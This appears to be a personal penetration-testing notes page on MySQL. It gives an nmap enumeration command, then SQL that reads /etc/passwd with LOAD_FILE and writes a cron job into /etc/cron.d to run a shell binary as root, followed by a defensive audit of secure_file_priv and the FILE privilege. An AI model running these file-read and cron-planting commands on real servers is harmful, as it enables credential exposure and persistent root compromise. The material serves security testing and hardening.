akde/infosec

Information security is ultimately about managing risk


Enumeration

Mandatory

  1. Try to connect to the DB.
  2. Enumerate with nmap:
    nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target

Optional

  • If you have access to the DB:
    • Try to read local files:
      SELECT load_file('/etc/passwd');
    • Try to write files:
      CREATE TABLE bbb(content TEXT);
      INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");
      SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';
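
Both file steps above depend on the account holding the global FILE privilege and on the server's `secure_file_priv` setting. The following audit is an added example, not part of the original checklist; it assumes an administrative session on a MySQL or MariaDB server, and `'app'@'%'` is a placeholder account name.

```sql
-- Added example: check whether LOAD_FILE() / INTO OUTFILE are usable on this server.

-- 1. Where may the server read or write files?
--    NULL  = LOAD_FILE() and INTO OUTFILE are disabled
--    ''    = no restriction (any path the mysqld OS user can reach)
--    /path = only files inside that directory
SELECT @@GLOBAL.secure_file_priv AS secure_file_priv;

-- 2. Which accounts hold the global FILE privilege that both statements require?
SELECT user, host
FROM mysql.user
WHERE File_priv = 'Y'
ORDER BY user, host;

-- 3. Remove FILE from an account that does not need it.
--    'app'@'%' is a placeholder; substitute an account returned by step 2.
REVOKE FILE ON *.* FROM 'app'@'%';

-- 4. Confirm the privilege is gone for that account.
SHOW GRANTS FOR 'app'@'%';

-- secure_file_priv cannot be changed at runtime: set it in the [mysqld]
-- section of the server configuration file and restart the server.
```

Even with FILE granted, reads and writes happen with the operating-system permissions of the mysqld process, so running the server as an unprivileged user keeps paths such as `/etc/cron.d` out of reach.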


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
